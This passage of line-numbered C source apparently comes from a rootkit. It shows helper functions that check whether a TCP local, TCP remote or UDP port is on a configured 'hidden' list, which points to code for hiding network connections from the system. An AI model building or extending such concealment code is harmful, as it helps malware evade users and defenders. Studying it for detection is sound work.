| 80 | return Configuration && IntegerListContains(Configuration->HiddenTcpLocalPorts, port); |
| 81 | } |
| 82 | BOOL IsTcpRemotePortHidden(USHORT port) |
| 83 | { |
| 84 | return Configuration && IntegerListContains(Configuration->HiddenTcpRemotePorts, port); |
| 85 | } |
| 86 | BOOL IsUdpPortHidden(USHORT port) |
| 87 | { |
| 88 | return Configuration && IntegerListContains(Configuration->HiddenUdpPorts, port); |
no test coverage detected